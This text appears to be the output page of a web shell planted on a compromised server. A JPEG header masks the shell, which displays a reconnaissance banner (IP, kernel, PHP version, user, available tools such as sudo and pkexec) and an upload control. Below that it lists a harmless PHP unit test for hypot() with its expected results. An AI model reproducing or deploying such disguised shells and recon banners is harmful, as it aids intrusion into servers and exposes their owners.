????JFIF??x?x????'
Server IP : 79.136.114.73 / Your IP : 18.222.57.238 Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64 User : www-data ( 33) PHP Version : 5.5.9-1ubuntu4.29 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority, MySQL : ON | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /proc/self/root/home/b8009/php-5.6.22/ext/standard/tests/math/ |
Upload File : |
--TEST-- Test hypot() - basic function test hypot() --INI-- precision=14 --FILE-- <?php /* Prototype : float hypot ( float $x , float $y ) * Description: Calculate the length of the hypotenuse of a right-angle triangle. * Source code: ext/standard/math.c */ echo "*** Testing hypot() : basic functionality ***\n"; $valuesy = array(23, -23, 2.345e1, -2.345e1, 0x17, 027, "23", "23.45", "2.345e1", "23abc", null, true, false); $valuesx = array(33, -33, 3.345e1, -3.345e1, 0x27, 037, "33", "43.45", "1.345e1", "33abc", null, true, false); for ($i = 0; $i < count($valuesy); $i++) { for ($j = 0; $j < count($valuesx); $j++) { echo "\nY:$valuesy[$i] X:$valuesx[$j] "; $res = hypot($valuesy[$i], $valuesx[$j]); var_dump($res); } } ?> ===Done=== --EXPECTF-- *** Testing hypot() : basic functionality *** Y:23 X:33 float(40.224370722238) Y:23 X:-33 float(40.224370722238) Y:23 X:33.45 float(40.594365372549) Y:23 X:-33.45 float(40.594365372549) Y:23 X:39 float(45.276925690687) Y:23 X:31 float(38.600518131238) Y:23 X:33 float(40.224370722238) Y:23 X:43.45 float(49.162002603637) Y:23 X:1.345e1 float(26.643995571235) Y:23 X:33abc Notice: A non well formed numeric value encountered in %s on line %d float(40.224370722238) Y:23 X: float(23) Y:23 X:1 float(23.021728866443) Y:23 X: float(23) Y:-23 X:33 float(40.224370722238) Y:-23 X:-33 float(40.224370722238) Y:-23 X:33.45 float(40.594365372549) Y:-23 X:-33.45 float(40.594365372549) Y:-23 X:39 float(45.276925690687) Y:-23 X:31 float(38.600518131238) Y:-23 X:33 float(40.224370722238) Y:-23 X:43.45 float(49.162002603637) Y:-23 X:1.345e1 float(26.643995571235) Y:-23 X:33abc Notice: A non well formed numeric value encountered in %s on line %d float(40.224370722238) Y:-23 X: float(23) Y:-23 X:1 float(23.021728866443) Y:-23 X: float(23) Y:23.45 X:33 float(40.483360779461) Y:23.45 X:-33 float(40.483360779461) Y:23.45 X:33.45 float(40.851009779441) Y:23.45 X:-33.45 float(40.851009779441) Y:23.45 X:39 float(45.507169764774) Y:23.45 X:31 float(38.870329301409) Y:23.45 X:33 float(40.483360779461) Y:23.45 X:43.45 float(49.374132903779) Y:23.45 X:1.345e1 float(27.033405260899) Y:23.45 X:33abc Notice: A non well formed numeric value encountered in %s on line %d float(40.483360779461) Y:23.45 X: float(23.45) Y:23.45 X:1 float(23.471312276905) Y:23.45 X: float(23.45) Y:-23.45 X:33 float(40.483360779461) Y:-23.45 X:-33 float(40.483360779461) Y:-23.45 X:33.45 float(40.851009779441) Y:-23.45 X:-33.45 float(40.851009779441) Y:-23.45 X:39 float(45.507169764774) Y:-23.45 X:31 float(38.870329301409) Y:-23.45 X:33 float(40.483360779461) Y:-23.45 X:43.45 float(49.374132903779) Y:-23.45 X:1.345e1 float(27.033405260899) Y:-23.45 X:33abc Notice: A non well formed numeric value encountered in %s on line %d float(40.483360779461) Y:-23.45 X: float(23.45) Y:-23.45 X:1 float(23.471312276905) Y:-23.45 X: float(23.45) Y:23 X:33 float(40.224370722238) Y:23 X:-33 float(40.224370722238) Y:23 X:33.45 float(40.594365372549) Y:23 X:-33.45 float(40.594365372549) Y:23 X:39 float(45.276925690687) Y:23 X:31 float(38.600518131238) Y:23 X:33 float(40.224370722238) Y:23 X:43.45 float(49.162002603637) Y:23 X:1.345e1 float(26.643995571235) Y:23 X:33abc Notice: A non well formed numeric value encountered in %s on line %d float(40.224370722238) Y:23 X: float(23) Y:23 X:1 float(23.021728866443) Y:23 X: float(23) Y:23 X:33 float(40.224370722238) Y:23 X:-33 float(40.224370722238) Y:23 X:33.45 float(40.594365372549) Y:23 X:-33.45 float(40.594365372549) Y:23 X:39 float(45.276925690687) Y:23 X:31 float(38.600518131238) Y:23 X:33 float(40.224370722238) Y:23 X:43.45 float(49.162002603637) Y:23 X:1.345e1 float(26.643995571235) Y:23 X:33abc Notice: A non well formed numeric value encountered in %s on line %d float(40.224370722238) Y:23 X: float(23) Y:23 X:1 float(23.021728866443) Y:23 X: float(23) Y:23 X:33 float(40.224370722238) Y:23 X:-33 float(40.224370722238) Y:23 X:33.45 float(40.594365372549) Y:23 X:-33.45 float(40.594365372549) Y:23 X:39 float(45.276925690687) Y:23 X:31 float(38.600518131238) Y:23 X:33 float(40.224370722238) Y:23 X:43.45 float(49.162002603637) Y:23 X:1.345e1 float(26.643995571235) Y:23 X:33abc Notice: A non well formed numeric value encountered in %s on line %d float(40.224370722238) Y:23 X: float(23) Y:23 X:1 float(23.021728866443) Y:23 X: float(23) Y:23.45 X:33 float(40.483360779461) Y:23.45 X:-33 float(40.483360779461) Y:23.45 X:33.45 float(40.851009779441) Y:23.45 X:-33.45 float(40.851009779441) Y:23.45 X:39 float(45.507169764774) Y:23.45 X:31 float(38.870329301409) Y:23.45 X:33 float(40.483360779461) Y:23.45 X:43.45 float(49.374132903779) Y:23.45 X:1.345e1 float(27.033405260899) Y:23.45 X:33abc Notice: A non well formed numeric value encountered in %s on line %d float(40.483360779461) Y:23.45 X: float(23.45) Y:23.45 X:1 float(23.471312276905) Y:23.45 X: float(23.45) Y:2.345e1 X:33 float(40.483360779461) Y:2.345e1 X:-33 float(40.483360779461) Y:2.345e1 X:33.45 float(40.851009779441) Y:2.345e1 X:-33.45 float(40.851009779441) Y:2.345e1 X:39 float(45.507169764774) Y:2.345e1 X:31 float(38.870329301409) Y:2.345e1 X:33 float(40.483360779461) Y:2.345e1 X:43.45 float(49.374132903779) Y:2.345e1 X:1.345e1 float(27.033405260899) Y:2.345e1 X:33abc Notice: A non well formed numeric value encountered in %s on line %d float(40.483360779461) Y:2.345e1 X: float(23.45) Y:2.345e1 X:1 float(23.471312276905) Y:2.345e1 X: float(23.45) Y:23abc X:33 Notice: A non well formed numeric value encountered in %s on line %d float(40.224370722238) Y:23abc X:-33 Notice: A non well formed numeric value encountered in %s on line %d float(40.224370722238) Y:23abc X:33.45 Notice: A non well formed numeric value encountered in %s on line %d float(40.594365372549) Y:23abc X:-33.45 Notice: A non well formed numeric value encountered in %s on line %d float(40.594365372549) Y:23abc X:39 Notice: A non well formed numeric value encountered in %s on line %d float(45.276925690687) Y:23abc X:31 Notice: A non well formed numeric value encountered in %s on line %d float(38.600518131238) Y:23abc X:33 Notice: A non well formed numeric value encountered in %s on line %d float(40.224370722238) Y:23abc X:43.45 Notice: A non well formed numeric value encountered in %s on line %d float(49.162002603637) Y:23abc X:1.345e1 Notice: A non well formed numeric value encountered in %s on line %d float(26.643995571235) Y:23abc X:33abc Notice: A non well formed numeric value encountered in %s on line %d Notice: A non well formed numeric value encountered in %s on line %d float(40.224370722238) Y:23abc X: Notice: A non well formed numeric value encountered in %s on line %d float(23) Y:23abc X:1 Notice: A non well formed numeric value encountered in %s on line %d float(23.021728866443) Y:23abc X: Notice: A non well formed numeric value encountered in %s on line %d float(23) Y: X:33 float(33) Y: X:-33 float(33) Y: X:33.45 float(33.45) Y: X:-33.45 float(33.45) Y: X:39 float(39) Y: X:31 float(31) Y: X:33 float(33) Y: X:43.45 float(43.45) Y: X:1.345e1 float(13.45) Y: X:33abc Notice: A non well formed numeric value encountered in %s on line %d float(33) Y: X: float(0) Y: X:1 float(1) Y: X: float(0) Y:1 X:33 float(33.015148038438) Y:1 X:-33 float(33.015148038438) Y:1 X:33.45 float(33.464944344792) Y:1 X:-33.45 float(33.464944344792) Y:1 X:39 float(39.012818406262) Y:1 X:31 float(31.016124838542) Y:1 X:33 float(33.015148038438) Y:1 X:43.45 float(43.461505956421) Y:1 X:1.345e1 float(13.487123488721) Y:1 X:33abc Notice: A non well formed numeric value encountered in %s on line %d float(33.015148038438) Y:1 X: float(1) Y:1 X:1 float(1.4142135623731) Y:1 X: float(1) Y: X:33 float(33) Y: X:-33 float(33) Y: X:33.45 float(33.45) Y: X:-33.45 float(33.45) Y: X:39 float(39) Y: X:31 float(31) Y: X:33 float(33) Y: X:43.45 float(43.45) Y: X:1.345e1 float(13.45) Y: X:33abc Notice: A non well formed numeric value encountered in %s on line %d float(33) Y: X: float(0) Y: X:1 float(1) Y: X: float(0) ===Done===